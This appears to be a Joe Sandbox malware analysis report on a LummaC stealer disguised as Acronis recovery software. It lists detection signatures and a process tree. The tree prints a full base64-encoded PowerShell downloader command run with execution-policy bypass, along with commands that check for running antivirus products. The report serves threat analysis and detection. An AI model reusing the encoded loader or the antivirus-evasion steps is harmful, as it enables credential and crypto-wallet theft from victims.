Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
acronis recovery expert deluxe 1.0.0.132.rarl.exe

Overview

General Information

Sample name:acronis recovery expert deluxe 1.0.0.132.rarl.exe
Analysis ID:1579835
MD5:2c83fb776a9e238d88e32393f17ae06a
SHA1:d74323c285d31ecd483e25c86e21222ca38ab227
SHA256:cb9670d377d8e1d3c11c63dc0e87f02339723ab2d88d10425a905437f6edb5a3
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64_ra
  • acronis recovery expert deluxe 1.0.0.132.rarl.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe" MD5: 2C83FB776A9E238D88E32393F17AE06A)
    • cmd.exe (PID: 6272 cmdline: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6668 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6620 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5948 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4692 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5744 cmdline: cmd /c md 650429 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 2864 cmdline: findstr /V "GERMANY" False MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6148 cmdline: cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Palestine.com (PID: 6176 cmdline: Palestine.com D MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 4540 cmdline: powershell -exec bypass -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJwBFAF0AKAA2AFMAdgB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQA2AFMAdgAtAEYAbABUAFYAZQBsAFQAVgAsAGwAVAAnACsAJwBWAEkATgBsAFQAVgAsAGwAVABWAFMAeQAnACsAJwBTAFQAbABUAFYALABsAFQAVgBtAC4AaQBvAGwAVABWACwAbABUAFYALgBTAGUARQBLAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArACcASQBsAFQAJwArACcAVgApACAAIAApACAAOwAgAHMAVgAgAGMAZwAwACcAKwAnAHEAIAAoACAAWwB0AFkAUABlAF0AKAA2AFMAdgB7ADMAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQA2AFMAdgAgAC0ARgBsAFQAVgB0AGUATQAuAGkATwAnACsAJwBsAFQAVgAsAGwAVABWAC4AUABsAFQAVgAsAGwAVABWAGgAbABUAFYALABsAFQAVgBTAFkAUwBsAFQAVgAsAGwAVABWAEEAVAAnACsAJwBsAFQAVgApACkAJwArACcAIAA7ACAAUwBlAHQALQBWAGEAcgBpACcAKwAnAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB1AEIAMgBnAHQAIAAtAFYAYQBsAHUAZQAgACgAWwBUAFkAUABlAF0AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEUAbQAuAEkAJwArACcATwAuAEYAbABUAFYALABsAFQAVgBTAHkAbABUAFYALABsAFQAVgBTAFQAbABUAFYALABsAFQAVgBJAEwARQBsAFQAVgApACkAIAAgADsAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAHMAYwBSAEkAUABUAEIATABPAEMAawAgAC0AVgBhAGwAdQBlACAAKAB7AAoAIAAnACsAJwAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFoASQBQAFUAUgBsACAALQBWAGEAbAB1AGUAIAAoADYAUwB2AHsAMwB9AHsANwB9AHsANgB9AHsANAB9AHsAOQB9AHsAMQB9AHsAMQAwAH0AewA4AH0AewAwAH0AewA1AH0AewAyAH0ANgBTAHYAIAAtAGYAbABUAFYAdABsACcAKwAnAFQAVgAsAGwAVABWAHAALwBsACcAKwAnAFQAVgAsAGwAVABWAHQAeAB0AGwAVABWACwAbABUAFYAaAB0AGwAVABWACwAbABUAFYAaQBwAHQAZQBkAGUAbABUAFYALABsAFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEIAYwBsAEkARQBOAHQAIAAtAFYAYQBsAHUAZQAgACgALgAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ADYAUwB2ACAALQBmAGwAVABWAGoAZQBjAHQAbABUAFYALABsAFQAVgBOAGUAdwBsAFQAVgAsAGwAVABWAC0ATwBiAGwAVABWACkAIAAoADYAUwB2AHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ADYAUwB2AC0AZgAgAGwAVABWAGUAdAAuAFcAbABUAFYALABsAFQAVgBTAHkAcwAnACsAJwB0AGUAbQAuAE4AbABUAFYALABsAFQAVgBlAGwAVABWACwAbABUAFYAJwArACcAYgBDAGwAaQBlAG4AdABsAFQAVgApACkACgAnACsAJwAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAJwArACcAbABlACAALQBOAGEAbQBlACAAWgBpAFAAZABhAHQAQQAgAC0AVgBhAGwAdQBlACcAKwAnACAAKABEAHkARQB7AHcAZQBCAFUAbQBCAEMATABCAFUAbQBJAEUAbgBUAH0ALgAoADYAUwB2AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ADYAUwB2ACAALQBmAGwAVABWAGEAdABsAFQAVgAsAGwAVABWAGEAZABEAGwAVABWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAEQAbwB3AG4AbABvAGwAVABWACkALgBJAG4AdgBvAGsAZQAoACcAKwAnAEQAeQBFAHsAegBCAFUAbQBJAFAAQgBVAG0AVQByAGwAfQApACcAKwAnACkACgAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIABNAEUATQBvAFIAeQAnACsAJwBTAFQAcgBFAEEAbQAgAC0AVgBhAGwAdQBlACAAKAAmACgANgBTAHYAewAyAH0AewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAZQBjACcAKwAnAHQAbABUAFYALABsAFQAVgBPAGIAagBsAFQAVgAsAGwAVABWAE4AZQB3AC0AbABUAFYAKQAgACgANgBTAHYAewAyAH0AewAzAH0AewAxAH0AJwArACcAewAwAH0ANgBTAHYALQBmACAAbABUAFYAJwArACcAYQBtAGwAVABWACwAbABUAFYAUwB0AHIAZQBsAFQAVgAsAGwAVABWAFMAeQBzAGwAVABWACwAbABUAFYAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBsAFQAVgApACkACgAgACAAIAAgAEQAeQBFAHsATQBlAG0AQgBVAG0AbwByAHkAUwBUAHIAQgBVAG0AZQBhAG0AfQAuACgANgBTAHYAewAwAH0AewAxAH0ANgBTAHYAIAAtAGYAbABUAFYAVwBsAFQAVgAsAGwAJwArACcAVABWAHIAaQB0AGUAbABUAFYAKQAuAEkAbgB2AG8AJwArACcAawBlACgARAB5AEUAewBaAEkAQgBVAG0AcABEAGEAVABBAH0ALAAgADAALAAgAEQAeQBFAHsAWgBpAFAAQgBVAG0ARABCAFUAbQBBAHQAYQB9AC4ANgBTAHYAbABlAG4ARwBCAFUAbQBUAEgANgBTAHYAKQAKACAAIAAgACAARAB5AEUAewBtAEUAbQBPAFIAQgBVAG0AWQBCAFUAbQBTAHQAQgBVAG0AUgBFAEIAVQBtAEEATQB9AC4ANgBTAHYAcwBCACcAKwAnAFUAbQBFAGUAJwArACcAawA2AFMAdgAoADAALAAgACAAKABWAEEAUgBJAEEAQgBMAEUAIAAoADYAUwB2ADgAbQBBADYAUwB2ACsANgBTAHYARgBaADYAUwB2ACkAIAApAC4AdgBhAGwAVQBlADoAOgA2AFMAdgBiAEIAVQBtAGUARwBJAE4ANgBTAHYAKQAKAAoAIAAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFUATgBpAHEAdQBFAEYATwBMAGQARQBSAG4AQQBNAGUAIAAtAFYAYQBsAHUAZQAgACgARAB5AEUAOABhAHAAQwA6ADoAKAA2AFMAdgB7ADEAfQB7ADAAfQB7ADIAfQA2AFMAdgAnACsAJwAgAC0AZgBsAFQAVgB1AGwAVABWACwAbABUAFYATgBlAHcARwBsAFQAVgAsAGwAVABWAGkAZABsAFQAVgApAC4ASQBuAHYAbwBrAGUAKAApAC4AKAA2AFMAdgB7ADAAfQB7ADEAfQB7ADIAfQA2AFMAdgAtAGYAbABUAFYAVABsAFQAJwArACcAVgAsAGwAVABWAG8AbABUAFYALABsAFQAVgBTAHQAcgBpAG4AZwBsAFQAVgApAC4ASQBuAHYAbwBrAGUAKAApACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAQQBwAFAARABBAFQAYQBQAGEAVABIACAALQBWAGEAbAB1AGUAIAAoAEQAeQBFAGMARwAwAFEAOgA6ACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYAIAAtAGYAbABUACcAKwAnAFYAZQBsAFQAVgAsAGwAVABWAEMAbwBtAGIAaQBuACcAKwAnAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAZQBCAFUAbQBOAEIAVQBtAFYAOgBsAG8AYwBBAEwAQgBVAG0AQQBQAFAARABBAHQAQQB9ACwAIABEAHkARQB7AFUAJwArACcAbgBJAHEAdQBFAEIAVQBtAEYATwBCAFUAbQAnACsAJwBMAEQAZQBSAG4AQgBVAG0AQQBNAEUAfQAnACsAJwApACkACgAgACAAIAAgAC4AKAA2AFMAdgB7ADEAfQB7ADAAfQA2AFMAdgAgAC0AZgBsAFQAVgBJAHQAJwArACcAZQBtAGwAVABWACwAJwArACcAbABUAFYATgBlAHcALQBsAFQAVgApACAALQBJAHQAZQBtAFQAeQBwAGUAIAAoADYAUwB2AHsAMAB9AHsAMgAnACsAJwB9AHsAMQB9ADYAUwB2ACcAKwAnAC0AZgBsAFQAVgBEAGkAcgBsAFQAVgAsAGwAVABWAHkAJwArACcAbABUAFYALABsAFQAVgBlAGMAdABvAHIAbABUAFYAKQAgAC0AUABhAHQAaAAgAEQAeQBFAHsAYQBwAEIAVQBtAFAAQgBVAG0AZABhAFQAYQBCAFUAbQBQAGEAVABoAH0AIAAtAEYAbwByAGMAZQAgAHoAbgBxACAALgAoADYAUwB2AHsAMQB9AHsAMAB9ADYAUwB2ACAALQBmACAAbABUAFYAdQB0AC0ATgB1AGwAbABsAFQAVgAsAGwAVABWAE8AbABUAFYAKQAKAAoAIAAgACAAIABTAGUAdAAtAFYAJwArACcAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AJwArACcAZQAgAHQAZQBNAFAAWgBJAHAAUABBAHQAJwArACcAaAAgAC0AVgBhAGwAdQBlACAAKAAoACAAZwBjAGkAIAAgAHYAYQBSAGkAQQBiAGwARQA6AEMAZwAwAFEAIAAgACkALgBWAGEAbAB1AGUAOgA6ACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAbwBtAGIAaQBuAGUAbABUAFYALABsAFQAVgBDAGwAVABWACkAJwArACcALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsARQBuAHYAQgBVAG0AOgB0AEUAQgBVAG0AbQAnACsAJwBwAH0ALAAgADYAUwB2AEQAeQBFAHUAbgBpACcAKwAnAHEAdQBlAEYAbwBsAGQAZQByAE4AYQBtACcAKwAnAGUALgB6AGkAcAA2AFMAdgApACkACgAgACAAIAAgACAAIAAoACAAIABnAEMAaQAgACgANgBTAHYAdgBBADYAUwB2ACsANgBTAHYAcgA2AFMAdgArADYAUwB2AGkAQQBiAGwAZQA6AFUAYgAyAEcAVAA2AFMAdgApACkALgBWAEEAbAB1AGUAOgA6ACgANgBTAHYAewAxAH0AewAzAH0AewAyAH0AewAwAH0ANgBTAHYAIAAtAGYAbABUAFYAbABCAHkAdABlAHMAbABUAFYALABsAFQAVgBXAHIAaQAnACsAJwB0AGwAVABWACwAbABUAFYAbABsAFQAVgAsACcAKwAnAGwAVABWAGUAQQBsAFQAVgApAC4ASQBuAHYAbwBrAGUAKABEAHkARQB7AHQAZQBtAHAAWgBJAHAAQgBVAG0AcABBAEIAVQBtAFQAaAB9ACwAIABEAHkARQB7AG0AZQBNAG8AQgBVAG0AUgBZAEIAVQBtAFMAdABSAEIAVQBtAEUAYQBNAH0ALgAoADYAUwB2AHsAMQB9AHsAMAB9ADYAUwB2AC0AZgBsAFQAVgByAGEAeQBsAFQAVgAsAGwAVABWAFQAbwBBAHIAbABUAFYAKQAuAEkAbgB2AG8AawBlACgAKQApAAoACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAUwBoAGUATABMACAALQBWAGEAbAB1AGUAIAAoAC4AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQA2AFMAdgAgAC0AZgBsAFQAVgBqAGUAYwB0AGwAVABWACwAbABUAFYATgBlAHcALQBsAFQAVgAsAGwAVABWAE8AYgBsAFQAVgApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgANgBTAHYAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxACcAKwAnAH0ANgBTAHYALQBmAGwAVABWAHAAbABpAGMAbABUAFYALABsAFQAVgBuAGwAVABWACwAbABUAFYAUwBoAGUAbABsAC4AQQBwAGwAVAAnACsAJwBWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAHQAaQBvAGwAVABWACkAKQAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB6AGkAcABGAG8AbABkAEUAUgAgAC0AVgBhAGwAdQBlACAAKABEAHkARQB7AHMAaABCAFUAbQBlAGwAbAB9AC4AKAA2AFMAdgB7ADAAfQB7ADEAfQB7ADIAfQA2AFMAJwArACcAdgAnACsAJwAgAC0AZgBsAFQAVgBOAGEAbQBsAFQAVgAsAGwAVABWAGUAUwBwAGEAbABUAFYALABsAFQAVgBjAGUAbABUAFYAKQAuAEkAbgB2AG8AawBlACgARAB5AEUAewB0AEUAbQBwAHoAQgBVAG0ASQBQAHAAQQBCAFUAbQBUAGgAfQApACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAARABlAHMAdAAnACsAJwBJAE4AYQBUAEkATwBuAGYATwBMAGQAZQByACAALQBWAGEAbAB1AGUAIAAoAEQAeQBFAHsAcwBCAFUAbQBoAGUAbABsAH0ALgAoADYAUwB2AHsAMAB9AHsAMQB9AHsAMgB9ADYAUwB2ACAALQBmACAAbABUAFYATgBhAG0AZQBTAHAAYQBsAFQAVgAsAGwAVABWAGMAbABUAFYALABsAFQAVgBlAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAYQBQAEIAVQBtAFAARABCAFUAbQBBAHQAQgBVAG0AQQBQAGEAVABIAH0AKQApAAoAIAAgACAAIABEAHkARQB7AEQAZQAnACsAJwBCAFUAbQBTAFQAaQBCAFUAbQBOAGEAVABpAG8AQgBVAG0ATgBGAE8ATABkAEUAcgB9AC4AKAA2AFMAdgB7ADAAfQB7ADEAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEMAbwBwAHkASABsAFQAVgAsAGwAVABWAGUAcgBlAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAWgBpAFAAQgBVAG0ARgBPAEwAQgBVAG0ARABCAFUAbQBlAHIAfQAuACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAdABlAG0AcwBsAFQAVgAsAGwAVABWAEkAbABUAFYAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAMgAwACkAIAAgAAoACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbAAnACsAJwBlACAALQBOAGEAbQBlACAARQB4AEUARgBpAGwAZQBzACAALQAnACsAJwBWAGEAbAB1AGUAIAAoACYAKAA2AFMAJwArACcAdgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQB7ADQAfQA2AFMAdgAtAGYAbABUAFYASQBsAFQAVgAsAGwAVABWAEcAbABUAFYALABsAFQAVgBlAHQALQBsAFQAVgAsAGwAVABWAEMAaABpAGwAZABsAFQAVgAsAGwAVABWACcAKwAnAHQAZQBtAGwAVABWACkAIAAtACcAKwAnAEYAaQBsAHQAZQByACAAKgAuAEIAVQBtAGUAWABFACAALQBSAGUAYwB1AHIAcwBlACAALQBQAGEAdABoACAARAB5AEUAewBhAFAAQgBVAG0AcABCAFUAbQBkAGEAQgBVAG0AVABBAFAAQQBUAGgAfQApAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACcAKwAnACAAKABEAHkARQB7AEUAQgBVAG0AeABFAEYASQBCAFUAbQBsAGUAfQAgAGkAbgAgAEQAeQBFAHsAZQBCAFUAbQAnACsAJwBYAGUARgBpAGwAQgBVAG0AZQBTAH0AKQAgAHsACgAgACAAIAAgACAAIAAgACAALgAoADYAUwB2AHsAMAB9AHsAMQB9AHsAMgB9ADYAUwB2AC0AZgAgAGwAVABWAFMAdABsAFQAVgAsAGwAVAAnACsAJwBWAGEAcgB0AC0AUAByAG8AYwBsAFQAVgAsAGwAVABWAGUAcwBzAGwAVABWACkAIAAtAEYAaQBsAGUAUABhAHQAaAAgAEQAeQBFAHsARQBYAEIAVQBtAEUARgBJAEIAVQBtAEwAZQB9AC4ANgBTAHYARgB1AEIAVQBtAGwAbABuAEIAVQBtAEEAbQBFADYAUwB2ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAIAAtAFcAYQBpAHQACgAgACAAIAAgAH0ACgAKAH0AKQAKAAoAJgAgAEQAeQBFAHsAcwBDAFIAaQBwAHQAQgBVAG0AQgBMAEIAVQBtAE8AYwBrAH0AIAA+ACAARAB5AEUAewBuAHUAQgBVAG0ATABsAH0AIAAyAD4AJgAxAAoAJwApACAALQByAEUAcABMAEEAYwBlACAAIAAoAFsAQwBoAEEAcgBdADYANgArAFsAQwBoAEEAcgBdADgANQArAFsAQwBoAEEAcgBdADEAMAA5ACkALABbAEMAaABBAHIAXQA5ADYALQByAEUAcABMAEEAYwBlACAAJwA2AFMAdgAnACwAWwBDAGgAQQByAF0AMwA0ACAAIAAtAGMAUgBFAHAATABBAEMAZQAnAEQAeQBFACcALABbAEMAaABBAHIAXQAzADYAIAAtAGMAUgBFAHAATABBAEMAZQAgACcAegBuAHEAJwAsAFsAQwBoAEEAcgBdADEAMgA0ACAAIAAtAGMAUgBFAHAATABBAEMAZQAnAGwAVABWACcALABbAEMAaABBAHIAXQAzADkAKQAgACkA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • msn.exe (PID: 3920 cmdline: "C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe" MD5: 537915708FE4E81E18E99D5104B353ED)
        • 5RLYIRN4B2NNKHJ11UTSZ2.exe (PID: 5288 cmdline: "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" MD5: 0EFDBBF3F5074D596D3E61446B623942)
          • 5RLYIRN4B2NNKHJ11UTSZ2.tmp (PID: 3840 cmdline: "C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$50362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" MD5: D8F3F93349755C2BD326DF91966FD6F5)
            • 5RLYIRN4B2NNKHJ11UTSZ2.exe (PID: 2092 cmdline: "C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT MD5: 0EFDBBF3F5074D596D3E61446B623942)
              • 5RLYIRN4B2NNKHJ11UTSZ2.tmp (PID: 4956 cmdline: "C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$60362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT MD5: D8F3F93349755C2BD326DF91966FD6F5)
                • cmd.exe (PID: 2876 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 3560 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 3928 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 5760 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 4332 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 4456 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 4936 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 4516 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 5132 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 3744 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5796 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 6444 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 6372 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5860 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 4992 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 5316 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 4308 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 1084 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • electronics.exe (PID: 4596 cmdline: "C:\Users\user\AppData\Roaming\Panorado\\electronics.exe" "C:\Users\user\AppData\Roaming\Panorado\\crooners.eml" MD5: 3F58A517F1F4796225137E7659AD2ADB)
      • choice.exe (PID: 6180 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • rundll32.exe (PID: 6352 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • acronis recovery expert deluxe 1.0.0.132.rarl.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe" MD5: 2C83FB776A9E238D88E32393F17AE06A)
    • cmd.exe (PID: 6344 cmdline: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
